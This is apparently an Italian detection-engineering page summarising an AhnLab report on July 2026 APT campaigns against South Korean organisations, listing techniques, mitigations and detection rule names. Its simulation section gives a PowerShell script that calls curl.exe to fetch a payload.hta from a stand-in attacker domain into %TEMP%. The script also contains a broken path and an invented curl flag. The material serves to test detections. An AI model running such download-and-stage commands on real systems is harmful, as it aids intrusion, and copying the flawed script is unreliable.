Rapporto sulle Minacce APT in Corea del Sud: Tendenze di Luglio 2026
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
AhnLab riporta un aumento dell’attività APT che prende di mira organizzazioni sudcoreane attraverso campagne di spear-phishing. Gli attacchi si basano principalmente su file LNK dannosi per consegnare payload inclusi script PowerShell, script AutoIt e backdoor. Le tecniche comuni includono la persistenza tramite Task Scheduler e l’esfiltrazione dei dati tramite servizi come Dropbox e PubNub.
Indagine
L’indagine si è concentrata sull’infrastruttura APT utilizzata contro entità sudcoreane durante il luglio 2026. Gli analisti hanno raggruppato l’attività in diversi tipi di attacco, da A a G, basandosi su metodi di consegna e caratteristiche funzionali. I ricercatori hanno anche identificato comportamenti tra cui il DLL side-loading e l’abuso di utilità native di Windows come curl.exe per il recupero del payload.
Mitigazione
Gli utenti dovrebbero verificare l’identità del mittente ed evitare di aprire allegati ricevuti da fonti sconosciute o non affidabili. Le organizzazioni dovrebbero mantenere aggiornati i sistemi operativi e i browser web con le ultime patch di sicurezza. È inoltre raccomandato mantenere soluzioni antivirus e di protezione degli endpoint aggiornate come V3.
Risposta
Se vengono rilevati file LNK sospetti o voci non autorizzate nel Task Scheduler, gli operatori di incident response dovrebbero isolare immediatamente l’host interessato. Dovrebbero essere eseguite analisi forensi della memoria per identificare backdoor iniettate o DLL dannose. I log di rete dovrebbero essere esaminati per connessioni in uscita insolite verso servizi di hosting file o canali di comando e controllo come PubNub.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Comportamento Sospetto di Evasione della Difesa MSHTA LOLBAS tramite Rilevamento di Comandi Associati (via process_creation)
Utilizzo Sospetto di CURL (via cmdline)
Task Pianificato Sospetto (via audit)
Possibile Infiltrazione/Esfiltrazione di Dati/C2 tramite Servizi/Terze Parti (via proxy)
Possibile Infiltrazione/Esfiltrazione di Dati/C2 tramite Servizi/Terze Parti (via dns)
IOC (HashMd5) da rilevare: Rapporto sulle Tendenze delle Minacce di Luglio 2026 su Attacchi APT (Corea del Sud)
Curl.Exe Usato per Scaricare ed Eseguire File Dannosi [Windows Sysmon]
Rilevare Comandi PowerShell Dannosi all’interno di File LNK [Windows Powershell]
Esecuzione della Simulazione
Prerequisito: Il Controllo Preparatorio Telemetria & Baseline deve essere passato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a errori di diagnostica.
-
Narrazione & Comandi dell’Attacco: L’avversario intende utilizzare
curl.exeper scaricare un file HTA dannoso nella%TEMP%directory per stabilire una base operativa. Per testare se la logica di rilevamento corrente funziona (poiché cerca specificamente le parole “download” o “execute”), l’attaccante utilizzerà una linea di comando che include esplicitamente queste parole come parte di un argomento falso o descrizione, simulando uno script male costruito o un tentativo specifico di imitare il pattern che il SOC sta cercando. -
Script di Test di Regressione:
# Simula un avversario usando curl con le parole chiave specifiche richieste dalla regola $tempPath = $env:TEMPmalicious.hta $url = "http://attacker-controlled-domain.com/payload.hta" # Questo comando è creato specificamente per attivare la logica 'contains' della regola # includendo le parole 'download' ed 'execute' nella stringa della linea di comando. Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'" -
Comandi di Pulizia:
# Rimuovi il file fittizio creato durante la simulazione if (Test-Path "$env:TEMPmalicious.hta") { Remove-Item -Path "$env:TEMPmalicious.hta" -Force }